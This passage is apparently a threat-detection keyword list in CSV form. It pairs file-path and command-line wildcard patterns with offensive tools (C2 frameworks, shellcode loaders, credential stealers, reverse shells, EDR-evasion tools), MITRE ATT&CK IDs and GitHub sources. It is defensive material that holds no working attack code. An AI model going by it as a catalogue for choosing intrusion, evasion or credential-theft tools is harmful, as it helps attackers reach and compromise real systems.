TA0002 - TA0040 - TA0043,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/BloodHound,1,0,N/A,10,10,8799,1624,2023-10-03T06:49:04Z,2016-04-17T18:36:14Z -*\BloodHound-win32-X64*,offensive_tool_keyword,BloodHound,BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment,T1069 - T1482 - T1018 - T1087 - T1027 - T1046,TA0007 - TA0003 - TA0002 - TA0040 - TA0043,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/BloodHound,1,0,N/A,10,10,8799,1624,2023-10-03T06:49:04Z,2016-04-17T18:36:14Z -*\bootkit-rs*,offensive_tool_keyword,bootkit-rs,Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus),T1542.004 - T1067.002 - T1012 - T1053.005 - T1057,TA0002 - TA0040 - TA0003 - TA0001,N/A,N/A,Defense Evasion,https://github.com/memN0ps/bootkit-rs,1,0,N/A,N/A,5,448,54,2023-09-12T07:23:15Z,2023-04-11T03:53:15Z -*\brc.zip*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*\BrowserEnum.log*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*\Bruteforcer.*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*\bypassuac.txt*,offensive_tool_keyword,SspiUacBypass,Bypassing UAC with SSPI Datagram Contexts,T1548.002,TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/SspiUacBypass,1,0,N/A,10,2,167,27,2023-09-24T17:33:25Z,2023-09-14T20:59:22Z -*\C2concealer*,offensive_tool_keyword,C2concealer,C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/RedSiege/C2concealer,1,0,N/A,10,10,850,162,2021-09-26T16:37:06Z,2020-03-23T14:13:16Z -*\certipy.pfx*,offensive_tool_keyword,certsync,Dump NTDS with golden certificates and UnPAC the hash,T1553.002 - T1003.001 - T1145,TA0002 - TA0003 - TA0006,N/A,N/A,Credential Access,https://github.com/zblurx/certsync,1,0,N/A,N/A,6,566,65,2023-07-25T15:22:06Z,2023-01-31T15:37:12Z -*\charlotte.cpp*,offensive_tool_keyword,charlotte,c++ fully undetected shellcode launcher,T1055.012 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/9emin1/charlotte,1,0,N/A,10,10,930,234,2021-06-11T04:44:18Z,2021-05-13T07:32:03Z -*\charlotte.py*,offensive_tool_keyword,charlotte,c++ fully undetected shellcode launcher,T1055.012 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/9emin1/charlotte,1,0,N/A,10,10,930,234,2021-06-11T04:44:18Z,2021-05-13T07:32:03Z -*\chimera.py*,offensive_tool_keyword,Chimera,Automated DLL Sideloading Tool With EDR Evasion Capabilities,T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005,TA0005,N/A,N/A,Defense Evasion,https://github.com/georgesotiriadis/Chimera,1,0,N/A,9,3,280,41,2023-09-21T14:01:23Z,2023-05-15T13:02:54Z -*\Chimera-main\*,offensive_tool_keyword,Chimera,Automated DLL Sideloading Tool With EDR Evasion Capabilities,T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005,TA0005,N/A,N/A,Defense Evasion,https://github.com/georgesotiriadis/Chimera,1,0,N/A,9,3,280,41,2023-09-21T14:01:23Z,2023-05-15T13:02:54Z -*\chisel.exe*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*\chisel-master*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*\Chrome_pass.db*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,0,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*\chromium_based_browsers.py*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*\CIMplant.exe*,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -*\CloakNDaggerC2*,offensive_tool_keyword,CloakNDaggerC2,A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.,T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002,TA0011 - TA0042 - TA0003,N/A,N/A,C2,https://github.com/matt-culbert/CloakNDaggerC2,1,0,N/A,10,10,4,2,2023-10-02T19:54:24Z,2023-04-28T01:58:18Z -*\cloud_enum.py*,offensive_tool_keyword,cloud_enum,Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.,T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/initstring/cloud_enum,1,0,N/A,6,10,1238,199,2023-07-31T07:27:37Z,2019-05-31T09:14:05Z -*\cme.exe* -d * -u * -H *,offensive_tool_keyword,crackmapexec,windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*\cme.exe* -d * -u * -p *,offensive_tool_keyword,crackmapexec,windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*\cme.exe* --shares*,offensive_tool_keyword,crackmapexec,windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*\codeloader.exe*,offensive_tool_keyword,C2 related tools,A shellcode loader written using nim,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/aeverj/NimShellCodeLoader,1,0,N/A,10,10,555,105,2023-08-26T12:48:08Z,2021-01-19T15:57:01Z -*\Coercer.py*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,1,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*\combine.exe*,offensive_tool_keyword,combine_harvester,Rust in-memory dumper,T1055 - T1055.001 - T1055.012,TA0005 - TA0006,N/A,N/A,Defense Evasion,https://github.com/m3f157O/combine_harvester,1,0,N/A,10,2,101,17,2023-07-26T07:16:00Z,2023-07-20T07:37:51Z -*\combine_gui.exe*,offensive_tool_keyword,combine_harvester,Rust in-memory dumper,T1055 - T1055.001 - T1055.012,TA0005 - TA0006,N/A,N/A,Defense Evasion,https://github.com/m3f157O/combine_harvester,1,0,N/A,10,2,101,17,2023-07-26T07:16:00Z,2023-07-20T07:37:51Z -*\COM-Hunter.csproj*,offensive_tool_keyword,COM-Hunter,COM-hunter is a COM Hijacking persistnce tool written in C#,T1122 - T1055.012,TA0003 - TA0005,N/A,N/A,Persistence,https://github.com/nickvourd/COM-Hunter,1,0,N/A,10,3,215,39,2023-09-06T09:48:55Z,2022-05-26T19:34:59Z -*\COM-Hunter.exe*,offensive_tool_keyword,COM-Hunter,COM-hunter is a COM Hijacking persistnce tool written in C#,T1122 - T1055.012,TA0003 - TA0005,N/A,N/A,Persistence,https://github.com/nickvourd/COM-Hunter,1,0,N/A,10,3,215,39,2023-09-06T09:48:55Z,2022-05-26T19:34:59Z -*\COM-Hunter.sln*,offensive_tool_keyword,COM-Hunter,COM-hunter is a COM Hijacking persistnce tool written in C#,T1122 - T1055.012,TA0003 - TA0005,N/A,N/A,Persistence,https://github.com/nickvourd/COM-Hunter,1,0,N/A,10,3,215,39,2023-09-06T09:48:55Z,2022-05-26T19:34:59Z -*\common_pass.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*\ComunicationC2.cpp*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,0,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*\Cooolis-ms-Loader\*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,0,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*\crackmapexecwin*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*\cradle.ps1*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,0,private github repo,10,,N/A,,, -*\Crassus-main*,offensive_tool_keyword,Crassus,Crassus Windows privilege escalation discovery tool,T1068 - T1003 - T1003.003 - T1046,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/vu-ls/Crassus,1,0,N/A,10,6,503,55,2023-09-29T20:02:02Z,2023-01-12T21:01:52Z -*\creditcards.py*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*\CredsPhish.log*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*\CrossC2.*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,0,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*\CROSSNET\CROSSNET\*,offensive_tool_keyword,cobaltstrike,Cobaltstrike payload generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dr0op/CrossNet-Beta,1,0,N/A,10,10,352,56,2022-07-18T06:23:16Z,2021-02-08T10:52:39Z -*\cryptolok*,offensive_tool_keyword,Github Username,redteam tools github repo ,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/cryptolok,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\curlshell-main*,offensive_tool_keyword,curlshell,reverse shell using curl,T1105 - T1059.004 - T1140,TA0011 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/irsl/curlshell,1,0,N/A,10,10,269,28,2023-09-29T08:31:47Z,2023-07-13T19:38:34Z -*\CurrentVersion\Uninstall\FreeFileSync_is1*,greyware_tool_keyword,freefilesync,freefilesync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://freefilesync.org/download.php,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*\CustomEncoding.cpp*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,0,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*\D1rkInject\*,offensive_tool_keyword,D1rkInject,Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state,T1055 - T1055.012 - T1055.002 - T1574.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/D1rkInject,1,0,N/A,9,2,129,24,2023-08-02T02:45:46Z,2023-08-02T02:13:55Z -*\darkexe.py*,offensive_tool_keyword,FourEye,AV Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/lengjibo/FourEye,1,0,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z -*\DarkLoadLibrary.*,offensive_tool_keyword,DarkLoadLibrary,LoadLibrary for offensive operations,T1071.001 - T1055.002 - T1055.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bats3c/DarkLoadLibrary,1,0,N/A,10,9,874,184,2021-10-22T07:27:58Z,2021-06-17T08:33:47Z -*\dcrypt.exe*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,0,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*\dcrypt.sys*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,0,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*\DCrypt\Bin*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,0,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*\dcrypt_setup.exe*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,0,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*\decrypted.dmp*,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,0,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -*\DelegationBOF.*,offensive_tool_keyword,DelegationBOF,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.,T1098 - T1214 - T1552,TA0006,N/A,N/A,Credential Access,https://github.com/IcebreakerSecurity/DelegationBOF,1,1,N/A,N/A,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z -*\demiguise.py*,offensive_tool_keyword,demiguise,The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.,T1564 - T1071.001 - T1071.004 - T1059 - T1070,TA0002 - TA0011 - TA0008,N/A,N/A,Defense Evasion,https://github.com/nccgroup/demiguise,1,0,N/A,9,10,1321,262,2022-11-09T08:12:25Z,2017-07-26T08:56:15Z -*\demon.dll*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*\demon.x64.bin*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*\demon.x64.exe*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*\demon1.dll*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*\demosyscalls.exe*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*\Dendrobate\*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,0,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*\Dendron.bin*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,0,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*\Dendron.exe*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,0,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*\Dendron.sln*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,0,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*\DInjector.sln*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,0,private github repo,10,,N/A,,, -*\DInjector\*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,0,private github repo,10,,N/A,,, -*\dist\sigthief.exe*,offensive_tool_keyword,metatwin,The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another,T1553.002 - T1114.001 - T1564.003,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/threatexpress/metatwin,1,0,N/A,9,4,303,72,2022-05-18T18:32:51Z,2017-10-08T13:26:00Z -*\dllexploit.cpp*,offensive_tool_keyword,RunAsWinTcb,RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.,T1073.002 - T1055.001 - T1055.002,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/tastypepperoni/RunAsWinTcb,1,0,N/A,10,2,119,16,2022-08-02T16:35:50Z,2022-07-29T16:36:06Z 